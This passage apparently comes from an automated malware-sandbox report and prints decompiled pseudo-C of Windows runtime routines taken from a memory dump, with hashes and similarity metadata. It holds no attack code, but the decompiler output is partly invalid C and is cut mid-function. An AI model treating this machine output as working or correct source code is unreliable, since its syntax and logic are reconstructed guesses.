                                                                                  									__eflags = _t109;
                                                                                  									if(_t109 >= 0) {
                                                                                  										L31:
                                                                                  										_t98 = _t108;
                                                                                  										_t39 = _t98 + 1; // 0x1
                                                                                  										_t106 = _t39;
                                                                                  										do {
                                                                                  											_t69 =  *_t98;
                                                                                  											_t98 = _t98 + 1;
                                                                                  											__eflags = _t69;
                                                                                  										} while (_t69 != 0);
                                                                                  										_t99 = _t98 - _t106;
                                                                                  										__eflags = _t99;
                                                                                  										L34:
                                                                                  										_t70 =  *[fs:0x30];
                                                                                  										__eflags =  *((char*)(_t70 + 2));
                                                                                  										if( *((char*)(_t70 + 2)) != 0) {
                                                                                  											L40:
                                                                                  											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                  											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                  											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                  											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                  											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                  											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                  											 *(_t114 - 4) = 1;
                                                                                  											_push(_t114 - 0x74);
                                                                                  											L00EFDEF0(_t99, _t106);
                                                                                  											 *(_t114 - 4) = 0xfffffffe;
                                                                                  											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                  											goto L3;
                                                                                  										}
                                                                                  										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                  										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                  											goto L40;
                                                                                  										}
                                                                                  										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                  										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                  										_push(_t99 & 0x0000ffff);
                                                                                  										_push(_t108);
                                                                                  										_push(1);
                                                                                  										_t101 = E00EEB280();
                                                                                  										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                  										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                  											__eflags = _t101 - 0x80000003;
                                                                                  											if(_t101 == 0x80000003) {
                                                                                  												E00EEB7E0(1);
                                                                                  												_t101 = 0;
                                                                                  												__eflags = 0;
                                                                                  											}
                                                                                  										}
                                                                                  										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                  										goto L4;
                                                                                  									}
                                                                                  									__eflags = _t109 - 0x80000005;
                                                                                  									if(_t109 == 0x80000005) {
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								 *(_t114 - 0x90) = 0;
                                                                                  								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                  								_t91 = E00EEE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                  								_t115 = _t115 + 0x10;
                                                                                  								_t104 = _t91;
                                                                                  								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                  								__eflags = _t104;
                                                                                  								if(_t104 < 0) {
                                                                                  									L21:
                                                                                  									_t109 = 0x80000005;
                                                                                  									 *(_t114 - 0x90) = 0x80000005;
                                                                                  									L22:
                                                                                  									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                  									L23:
                                                                                  									 *(_t114 - 0x94) = _t109;
                                                                                  									goto L26;
                                                                                  								}
                                                                                  								__eflags = _t104 - _t92;
                                                                                  								if(__eflags > 0) {
                                                                                  									goto L21;
                                                                                  								}
                                                                                  								if(__eflags == 0) {
                                                                                  									goto L22;
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							}
                                                                                  							goto L15;
                                                                                  						}
                                                                                  					}
                                                                                  					__eflags = _t109;
                                                                                  					if(_t109 >= 0) {
                                                                                  						goto L31;
                                                                                  					}
                                                                                  					__eflags = _t109 - 0x80000005;
                                                                                  					if(_t109 != 0x80000005) {
                                                                                  						goto L31;
                                                                                  					}
                                                                                  					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                  					_t38 = _t95 - 1; // -129
                                                                                  					_t99 = _t38;
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                  					__eflags = __edx - 0x65;
                                                                                  					if(__edx != 0x65) {
                                                                                  						goto L2;
                                                                                  					}
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				L2:
                                                                                  				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                  				_push(_t106);
                                                                                  				if(E00EEA890() != 0) {
                                                                                  					goto L6;
                                                                                  				}
                                                                                  				goto L3;
                                                                                  			}























                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: _vswprintf_s
                                                                                  • String ID:
                                                                                  • API String ID: 677850445-0
                                                                                  • Opcode ID: 932fc136000af3f5405e9f4736d597217671e039f5d77805573203b67937e062
                                                                                  • Instruction ID: 1b1db884a9572258c0ae00d71820b21e46261c486fecaa61ef718a095f51c168
                                                                                  • Opcode Fuzzy Hash: 932fc136000af3f5405e9f4736d597217671e039f5d77805573203b67937e062
                                                                                  • Instruction Fuzzy Hash: AD51C3B1D002598EDF30CF648845BAEBBF1BF05720F1081ADEA59AB2C2D7706D45BB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 76%
                                                                                  			E00ECB944(signed int* __ecx, char __edx) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				char _v28;
                                                                                  				signed int _v32;
                                                                                  				char _v36;
                                                                                  				signed int _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				signed int* _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				intOrPtr _v68;
                                                                                  				intOrPtr _v72;
                                                                                  				intOrPtr _v76;
                                                                                  				char _v77;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				intOrPtr* _t65;
                                                                                  				intOrPtr _t67;
                                                                                  				intOrPtr _t68;
                                                                                  				char* _t73;
                                                                                  				intOrPtr _t77;
                                                                                  				intOrPtr _t78;
                                                                                  				signed int _t82;
                                                                                  				intOrPtr _t83;
                                                                                  				void* _t87;
                                                                                  				char _t88;
                                                                                  				intOrPtr* _t89;
                                                                                  				intOrPtr _t91;
                                                                                  				void* _t97;
                                                                                  				intOrPtr _t100;
                                                                                  				void* _t102;
                                                                                  				void* _t107;
                                                                                  				signed int _t108;
                                                                                  				intOrPtr* _t112;
                                                                                  				void* _t113;
                                                                                  				intOrPtr* _t114;
                                                                                  				intOrPtr _t115;
                                                                                  				intOrPtr _t116;
                                                                                  				intOrPtr _t117;
                                                                                  				signed int _t118;
                                                                                  				void* _t130;
                                                                                  
                                                                                  				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                                                                                  				_v8 =  *0xf9d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                                                                                  				_t112 = __ecx;
                                                                                  				_v77 = __edx;
                                                                                  				_v48 = __ecx;
                                                                                  				_v28 = 0;
                                                                                  				_t5 = _t112 + 0xc; // 0x575651ff
                                                                                  				_t105 =  *_t5;
                                                                                  				_v20 = 0;
                                                                                  				_v16 = 0;
                                                                                  				if(_t105 == 0) {
                                                                                  					_t50 = _t112 + 4; // 0x5de58b5b
                                                                                  					_t60 =  *__ecx |  *_t50;
                                                                                  					if(( *__ecx |  *_t50) != 0) {
                                                                                  						 *__ecx = 0;
                                                                                  						__ecx[1] = 0;
                                                                                  						if(E00EC7D50() != 0) {
                                                                                  							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                  						} else {
                                                                                  							_t65 = 0x7ffe0386;
                                                                                  						}
                                                                                  						if( *_t65 != 0) {
                                                                                  							E00F78CD6(_t112);
                                                                                  						}
                                                                                  						_push(0);
                                                                                  						_t52 = _t112 + 0x10; // 0x778df98b
                                                                                  						_push( *_t52);
                                                                                  						_t60 = E00EE9E20();
                                                                                  					}
                                                                                  					L20:
                                                                                  					_pop(_t107);
                                                                                  					_pop(_t113);
                                                                                  					_pop(_t87);
                                                                                  					return E00EEB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                                                                                  				}
                                                                                  				_t8 = _t112 + 8; // 0x8b000cc2
                                                                                  				_t67 =  *_t8;
                                                                                  				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                                                                                  				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                                                                                  				_t108 =  *(_t67 + 0x14);
                                                                                  				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                                                                                  				_t105 = 0x2710;
                                                                                  				asm("sbb eax, edi");
                                                                                  				_v44 = _t88;
                                                                                  				_v52 = _t108;
                                                                                  				_t60 = E00EECE00(_t97, _t68, 0x2710, 0);
                                                                                  				_v56 = _t60;
                                                                                  				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                                                                                  					L3:
                                                                                  					 *(_t112 + 0x44) = _t60;
                                                                                  					_t105 = _t60 * 0x2710 >> 0x20;
                                                                                  					 *_t112 = _t88;
                                                                                  					 *(_t112 + 4) = _t108;
                                                                                  					_v20 = _t60 * 0x2710;
                                                                                  					_v16 = _t60 * 0x2710 >> 0x20;
                                                                                  					if(_v77 != 0) {
                                                                                  						L16:
                                                                                  						_v36 = _t88;
                                                                                  						_v32 = _t108;
                                                                                  						if(E00EC7D50() != 0) {
                                                                                  							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                  						} else {
                                                                                  							_t73 = 0x7ffe0386;
                                                                                  						}
                                                                                  						if( *_t73 != 0) {
                                                                                  							_t105 = _v40;
                                                                                  							E00F78F6A(_t112, _v40, _t88, _t108);
                                                                                  						}
                                                                                  						_push( &_v28);
                                                                                  						_push(0);
                                                                                  						_push( &_v36);
                                                                                  						_t48 = _t112 + 0x10; // 0x778df98b
                                                                                  						_push( *_t48);
                                                                                  						_t60 = E00EEAF60();
                                                                                  						goto L20;
                                                                                  					} else {
                                                                                  						_t89 = 0x7ffe03b0;
                                                                                  						do {
                                                                                  							_t114 = 0x7ffe0010;
                                                                                  							do {
                                                                                  								_t77 =  *0xf98628; // 0x0
                                                                                  								_v68 = _t77;
                                                                                  								_t78 =  *0xf9862c; // 0x0
                                                                                  								_v64 = _t78;
                                                                                  								_v72 =  *_t89;
                                                                                  								_v76 =  *((intOrPtr*)(_t89 + 4));
                                                                                  								while(1) {
                                                                                  									_t105 =  *0x7ffe000c;
                                                                                  									_t100 =  *0x7ffe0008;
                                                                                  									if(_t105 ==  *_t114) {
                                                                                  										goto L8;
                                                                                  									}
                                                                                  									asm("pause");
                                                                                  								}
                                                                                  								L8:
                                                                                  								_t89 = 0x7ffe03b0;
                                                                                  								_t115 =  *0x7ffe03b0;
                                                                                  								_t82 =  *0x7FFE03B4;
                                                                                  								_v60 = _t115;
                                                                                  								_t114 = 0x7ffe0010;
                                                                                  								_v56 = _t82;
                                                                                  							} while (_v72 != _t115 || _v76 != _t82);
                                                                                  							_t83 =  *0xf98628; // 0x0
                                                                                  							_t116 =  *0xf9862c; // 0x0
                                                                                  							_v76 = _t116;
                                                                                  							_t117 = _v68;
                                                                                  						} while (_t117 != _t83 || _v64 != _v76);
                                                                                  						asm("sbb edx, [esp+0x24]");
                                                                                  						_t102 = _t100 - _v60 - _t117;
                                                                                  						_t112 = _v48;
                                                                                  						_t91 = _v44;
                                                                                  						asm("sbb edx, eax");
                                                                                  						_t130 = _t105 - _v52;
                                                                                  						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                  							_t88 = _t102 - _t91;
                                                                                  							asm("sbb edx, edi");
                                                                                  							_t108 = _t105;
                                                                                  						} else {
                                                                                  							_t88 = 0;
                                                                                  							_t108 = 0;
                                                                                  						}
                                                                                  						goto L16;
                                                                                  					}
                                                                                  				} else {
                                                                                  					if( *(_t112 + 0x44) == _t60) {
                                                                                  						goto L20;
                                                                                  					}
                                                                                  					goto L3;
                                                                                  				}
                                                                                  			}

















































                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECB9A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID:
                                                                                  • API String ID: 885266447-0
                                                                                  • Opcode ID: 2ba8e9467f5b5b3febdef34421deaed233622040a874f16c7186d80a57b2b163
                                                                                  • Instruction ID: 1367a1cc38ce77f63b84ce9371f003018b63e48b612288e870ad8b610f8d8282
                                                                                  • Opcode Fuzzy Hash: 2ba8e9467f5b5b3febdef34421deaed233622040a874f16c7186d80a57b2b163
                                                                                  • Instruction Fuzzy Hash: 3D517870A08340CFC720CF29C581A2ABBE5BB88354F24996EF5C5A7355DB32EC41CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 81%
                                                                                  			E00ED2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200297) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v16;
                                                                                  				unsigned int _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				unsigned int _v36;
                                                                                  				signed int _v37;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				signed int _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				signed int _v64;
                                                                                  				signed int _v68;
                                                                                  				signed int _v72;
                                                                                  				signed int _v76;
                                                                                  				signed int _v80;
                                                                                  				signed int _t243;
                                                                                  				signed int _t247;
                                                                                  				void* _t248;
                                                                                  				signed int _t253;
                                                                                  				signed int _t255;
                                                                                  				intOrPtr _t257;
                                                                                  				signed int _t260;
                                                                                  				signed int _t267;
                                                                                  				signed int _t270;
                                                                                  				signed int _t278;
                                                                                  				intOrPtr _t284;
                                                                                  				signed int _t286;
                                                                                  				signed int _t288;
                                                                                  				void* _t289;
                                                                                  				void* _t290;
                                                                                  				signed int _t291;
                                                                                  				unsigned int _t294;
                                                                                  				signed int _t298;
                                                                                  				void* _t299;
                                                                                  				signed int _t301;
                                                                                  				signed int _t305;
                                                                                  				intOrPtr _t317;
                                                                                  				signed int _t326;
                                                                                  				signed int _t328;
                                                                                  				signed int _t329;
                                                                                  				signed int _t333;
                                                                                  				signed int _t334;
                                                                                  				signed int _t336;
                                                                                  				signed int _t338;
                                                                                  				signed int _t341;
                                                                                  				void* _t342;
                                                                                  
                                                                                  				_t338 = _t341;
                                                                                  				_t342 = _t341 - 0x4c;
                                                                                  				_v8 =  *0xf9d360 ^ _t338;
                                                                                  				_push(__ebx);
                                                                                  				_push(__esi);
                                                                                  				_push(__edi);
                                                                                  				_t333 = 0xf9b2e8;
                                                                                  				_v56 = _a4;
                                                                                  				_v48 = __edx;
                                                                                  				_v60 = __ecx;
                                                                                  				_t294 = 0;
                                                                                  				_v80 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v64 = 0;
                                                                                  				_v76 = 0;
                                                                                  				_v72 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v44 = 0;
                                                                                  				_v52 = 0;
                                                                                  				_v68 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v32 = 0;
                                                                                  				_v36 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v16 = 0;
                                                                                  				_t284 = 0x48;
                                                                                  				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                                  				_t326 = 0;
                                                                                  				_v37 = _t315;
                                                                                  				if(_v48 <= 0) {
                                                                                  					L16:
                                                                                  					_t45 = _t284 - 0x48; // 0x0
                                                                                  					__eflags = _t45 - 0xfffe;
                                                                                  					if(_t45 > 0xfffe) {
                                                                                  						_t334 = 0xc0000106;
                                                                                  						goto L32;
                                                                                  					} else {
                                                                                  						_t333 = L00EC4620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
                                                                                  						_v52 = _t333;
                                                                                  						__eflags = _t333;
                                                                                  						if(_t333 == 0) {
                                                                                  							_t334 = 0xc0000017;
                                                                                  							goto L32;
                                                                                  						} else {
                                                                                  							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
                                                                                  							_t50 = _t333 + 0x48; // 0x48
                                                                                  							_t328 = _t50;
                                                                                  							_t315 = _v32;
                                                                                  							 *((intOrPtr*)(_t333 + 0x3c)) = _t284;
                                                                                  							_t286 = 0;
                                                                                  							 *((short*)(_t333 + 0x30)) = _v48;
                                                                                  							__eflags = _t315;
                                                                                  							if(_t315 != 0) {
                                                                                  								 *(_t333 + 0x18) = _t328;
                                                                                  								__eflags = _t315 - 0xf98478;
                                                                                  								 *_t333 = ((0 | _t315 == 0x00f98478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                  								E00EEF3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
                                                                                  								_t315 = _v32;
                                                                                  								_t342 = _t342 + 0xc;
                                                                                  								_t286 = 1;
                                                                                  								__eflags = _a8;
                                                                                  								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
                                                                                  								if(_a8 != 0) {
                                                                                  									_t278 = E00F339F2(_t328);
                                                                                  									_t315 = _v32;
                                                                                  									_t328 = _t278;
                                                                                  								}
                                                                                  							}
                                                                                  							_t298 = 0;
                                                                                  							_v16 = 0;
                                                                                  							__eflags = _v48;
                                                                                  							if(_v48 <= 0) {
                                                                                  								L31:
                                                                                  								_t334 = _v68;
                                                                                  								__eflags = 0;
                                                                                  								 *((short*)(_t328 - 2)) = 0;
                                                                                  								goto L32;
                                                                                  							} else {
                                                                                  								_t288 = _t333 + _t286 * 4;
                                                                                  								_v56 = _t288;
                                                                                  								do {
                                                                                  									__eflags = _t315;
                                                                                  									if(_t315 != 0) {
                                                                                  										_t243 =  *(_v60 + _t298 * 4);
                                                                                  										__eflags = _t243;
                                                                                  										if(_t243 == 0) {
                                                                                  											goto L30;
                                                                                  										} else {
                                                                                  											__eflags = _t243 == 5;
                                                                                  											if(_t243 == 5) {
                                                                                  												goto L30;
                                                                                  											} else {
                                                                                  												goto L22;
                                                                                  											}
                                                                                  										}
                                                                                  									} else {
                                                                                  										L22:
                                                                                  										 *_t288 =  *(_v60 + _t298 * 4);
                                                                                  										 *(_t288 + 0x18) = _t328;
                                                                                  										_t247 =  *(_v60 + _t298 * 4);
                                                                                  										__eflags = _t247 - 8;
                                                                                  										if(_t247 > 8) {
                                                                                  											goto L56;
                                                                                  										} else {
                                                                                  											switch( *((intOrPtr*)(_t247 * 4 +  &M00ED2959))) {
                                                                                  												case 0:
                                                                                  													__ax =  *0xf98488;
                                                                                  													__eflags = __ax;
                                                                                  													if(__ax == 0) {
                                                                                  														goto L29;
                                                                                  													} else {
                                                                                  														__ax & 0x0000ffff = E00EEF3E0(__edi,  *0xf9848c, __ax & 0x0000ffff);
                                                                                  														__eax =  *0xf98488 & 0x0000ffff;
                                                                                  														goto L26;
                                                                                  													}
                                                                                  													goto L108;
                                                                                  												case 1:
                                                                                  													L45:
                                                                                  													E00EEF3E0(_t328, _v80, _v64);
                                                                                  													_t273 = _v64;
                                                                                  													goto L26;
                                                                                  												case 2:
                                                                                  													 *0xf98480 & 0x0000ffff = E00EEF3E0(__edi,  *0xf98484,  *0xf98480 & 0x0000ffff);
                                                                                  													__eax =  *0xf98480 & 0x0000ffff;
                                                                                  													__eax = ( *0xf98480 & 0x0000ffff) >> 1;
                                                                                  													__edi = __edi + __eax * 2;
                                                                                  													goto L28;
                                                                                  												case 3:
                                                                                  													__eax = _v44;
                                                                                  													__eflags = __eax;
                                                                                  													if(__eax == 0) {
                                                                                  														goto L29;
                                                                                  													} else {
                                                                                  														__esi = __eax + __eax;
                                                                                  														__eax = E00EEF3E0(__edi, _v72, __esi);
                                                                                  														__edi = __edi + __esi;
                                                                                  														__esi = _v52;
                                                                                  														goto L27;
                                                                                  													}
                                                                                  													goto L108;
                                                                                  												case 4:
                                                                                  													_push(0x2e);
                                                                                  													_pop(__eax);
                                                                                  													 *(__esi + 0x44) = __edi;
                                                                                  													 *__edi = __ax;
                                                                                  													__edi = __edi + 4;
                                                                                  													_push(0x3b);
                                                                                  													_pop(__eax);
                                                                                  													 *(__edi - 2) = __ax;
                                                                                  													goto L29;
                                                                                  												case 5:
                                                                                  													__eflags = _v36;
                                                                                  													if(_v36 == 0) {
                                                                                  														goto L45;
                                                                                  													} else {
                                                                                  														E00EEF3E0(_t328, _v76, _v36);
                                                                                  														_t273 = _v36;
                                                                                  													}
                                                                                  													L26:
                                                                                  													_t342 = _t342 + 0xc;
                                                                                  													_t328 = _t328 + (_t273 >> 1) * 2 + 2;
                                                                                  													__eflags = _t328;
                                                                                  													L27:
                                                                                  													_push(0x3b);
                                                                                  													_pop(_t275);
                                                                                  													 *((short*)(_t328 - 2)) = _t275;
                                                                                  													goto L28;
                                                                                  												case 6:
                                                                                  													__ebx =  *0xf9575c;
                                                                                  													__eflags = __ebx - 0xf9575c;
                                                                                  													if(__ebx != 0xf9575c) {
                                                                                  														_push(0x3b);
                                                                                  														_pop(__esi);
                                                                                  														do {
                                                                                  															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                  															E00EEF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                  															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                  															__edi = __edi + __eax * 2;
                                                                                  															__edi = __edi + 2;
                                                                                  															 *(__edi - 2) = __si;
                                                                                  															__ebx =  *__ebx;
                                                                                  															__eflags = __ebx - 0xf9575c;
                                                                                  														} while (__ebx != 0xf9575c);
                                                                                  														__esi = _v52;
                                                                                  														__ecx = _v16;
                                                                                  														__edx = _v32;
                                                                                  													}
                                                                                  													__ebx = _v56;
                                                                                  													goto L29;
                                                                                  												case 7:
                                                                                  													 *0xf98478 & 0x0000ffff = E00EEF3E0(__edi,  *0xf9847c,  *0xf98478 & 0x0000ffff);
                                                                                  													__eax =  *0xf98478 & 0x0000ffff;
                                                                                  													__eax = ( *0xf98478 & 0x0000ffff) >> 1;
                                                                                  													__eflags = _a8;
                                                                                  													__edi = __edi + __eax * 2;
                                                                                  													if(_a8 != 0) {
                                                                                  														__ecx = __edi;
                                                                                  														__eax = E00F339F2(__ecx);
                                                                                  														__edi = __eax;
                                                                                  													}
                                                                                  													goto L28;
                                                                                  												case 8:
                                                                                  													__eax = 0;
                                                                                  													 *(__edi - 2) = __ax;
                                                                                  													 *0xf96e58 & 0x0000ffff = E00EEF3E0(__edi,  *0xf96e5c,  *0xf96e58 & 0x0000ffff);
                                                                                  													 *(__esi + 0x38) = __edi;
                                                                                  													__eax =  *0xf96e58 & 0x0000ffff;
                                                                                  													__eax = ( *0xf96e58 & 0x0000ffff) >> 1;
                                                                                  													__edi = __edi + __eax * 2;
                                                                                  													__edi = __edi + 2;
                                                                                  													L28:
                                                                                  													_t298 = _v16;
                                                                                  													_t315 = _v32;
                                                                                  													L29:
                                                                                  													_t288 = _t288 + 4;
                                                                                  													__eflags = _t288;
                                                                                  													_v56 = _t288;
                                                                                  													goto L30;
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  									goto L108;
                                                                                  									L30:
                                                                                  									_t298 = _t298 + 1;
                                                                                  									_v16 = _t298;
                                                                                  									__eflags = _t298 - _v48;
                                                                                  								} while (_t298 < _v48);
                                                                                  								goto L31;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				} else {
                                                                                  					while(1) {
                                                                                  						L1:
                                                                                  						_t247 =  *(_v60 + _t326 * 4);
                                                                                  						if(_t247 > 8) {
                                                                                  							break;
                                                                                  						}
                                                                                  						switch( *((intOrPtr*)(_t247 * 4 +  &M00ED2935))) {
                                                                                  							case 0:
                                                                                  								__ax =  *0xf98488;
                                                                                  								__eflags = __ax;
                                                                                  								if(__ax != 0) {
                                                                                  									__eax = __ax & 0x0000ffff;
                                                                                  									__ebx = __ebx + 2;
                                                                                  									__eflags = __ebx;
                                                                                  									goto L53;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 1:
                                                                                  								L44:
                                                                                  								_t315 =  &_v64;
                                                                                  								_v80 = E00ED2E3E(0,  &_v64);
                                                                                  								_t284 = _t284 + _v64 + 2;
                                                                                  								goto L13;
                                                                                  							case 2:
                                                                                  								__eax =  *0xf98480 & 0x0000ffff;
                                                                                  								__ebx = __ebx + __eax;
                                                                                  								__eflags = __dl;
                                                                                  								if(__dl != 0) {
                                                                                  									__eax = 0xf98480;
                                                                                  									goto L80;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 3:
                                                                                  								__eax = E00EBEEF0(0xf979a0);
                                                                                  								__eax =  &_v44;
                                                                                  								_push(__eax);
                                                                                  								_push(0);
                                                                                  								_push(0);
                                                                                  								_push(4);
                                                                                  								_push(L"PATH");
                                                                                  								_push(0);
                                                                                  								L57();
                                                                                  								__esi = __eax;
                                                                                  								_v68 = __esi;
                                                                                  								__eflags = __esi - 0xc0000023;
                                                                                  								if(__esi != 0xc0000023) {
                                                                                  									L10:
                                                                                  									__eax = E00EBEB70(__ecx, 0xf979a0);
                                                                                  									__eflags = __esi - 0xc0000100;
                                                                                  									if(__esi == 0xc0000100) {
                                                                                  										_v44 = _v44 & 0x00000000;
                                                                                  										__eax = 0;
                                                                                  										_v68 = 0;
                                                                                  										goto L13;
                                                                                  									} else {
                                                                                  										__eflags = __esi;
                                                                                  										if(__esi < 0) {
                                                                                  											L32:
                                                                                  											_t221 = _v72;
                                                                                  											__eflags = _t221;
                                                                                  											if(_t221 != 0) {
                                                                                  												L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
                                                                                  											}
                                                                                  											_t222 = _v52;
                                                                                  											__eflags = _t222;
                                                                                  											if(_t222 != 0) {
                                                                                  												__eflags = _t334;
                                                                                  												if(_t334 < 0) {
                                                                                  													L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
                                                                                  													_t222 = 0;
                                                                                  												}
                                                                                  											}
                                                                                  											goto L36;
                                                                                  										} else {
                                                                                  											__eax = _v44;
                                                                                  											__ebx = __ebx + __eax * 2;
                                                                                  											__ebx = __ebx + 2;
                                                                                  											__eflags = __ebx;
                                                                                  											L13:
                                                                                  											_t294 = _v36;
                                                                                  											goto L14;
                                                                                  										}
                                                                                  									}
                                                                                  								} else {
                                                                                  									__eax = _v44;
                                                                                  									__ecx =  *0xf97b9c; // 0x0
                                                                                  									_v44 + _v44 =  *[fs:0x30];
                                                                                  									__ecx = __ecx + 0x180000;
                                                                                  									__eax = L00EC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                  									_v72 = __eax;
                                                                                  									__eflags = __eax;
                                                                                  									if(__eax == 0) {
                                                                                  										__eax = E00EBEB70(__ecx, 0xf979a0);
                                                                                  										__eax = _v52;
                                                                                  										L36:
                                                                                  										_pop(_t327);
                                                                                  										_pop(_t335);
                                                                                  										__eflags = _v8 ^ _t338;
                                                                                  										_pop(_t285);
                                                                                  										return E00EEB640(_t222, _t285, _v8 ^ _t338, _t315, _t327, _t335);
                                                                                  									} else {
                                                                                  										__ecx =  &_v44;
                                                                                  										_push(__ecx);
                                                                                  										_push(_v44);
                                                                                  										_push(__eax);
                                                                                  										_push(4);
                                                                                  										_push(L"PATH");
                                                                                  										_push(0);
                                                                                  										L57();
                                                                                  										__esi = __eax;
                                                                                  										_v68 = __eax;
                                                                                  										goto L10;
                                                                                  									}
                                                                                  								}
                                                                                  								goto L108;
                                                                                  							case 4:
                                                                                  								__ebx = __ebx + 4;
                                                                                  								goto L14;
                                                                                  							case 5:
                                                                                  								_t280 = _v56;
                                                                                  								if(_v56 != 0) {
                                                                                  									_t315 =  &_v36;
                                                                                  									_t282 = E00ED2E3E(_t280,  &_v36);
                                                                                  									_t294 = _v36;
                                                                                  									_v76 = _t282;
                                                                                  								}
                                                                                  								if(_t294 == 0) {
                                                                                  									goto L44;
                                                                                  								} else {
                                                                                  									_t284 = _t284 + 2 + _t294;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 6:
                                                                                  								__eax =  *0xf95764 & 0x0000ffff;
                                                                                  								goto L53;
                                                                                  							case 7:
                                                                                  								__eax =  *0xf98478 & 0x0000ffff;
                                                                                  								__ebx = __ebx + __eax;
                                                                                  								__eflags = _a8;
                                                                                  								if(_a8 != 0) {
                                                                                  									__ebx = __ebx + 0x16;
                                                                                  									__ebx = __ebx + __eax;
                                                                                  								}
                                                                                  								__eflags = __dl;
                                                                                  								if(__dl != 0) {
                                                                                  									__eax = 0xf98478;
                                                                                  									L80:
                                                                                  									_v32 = __eax;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 8:
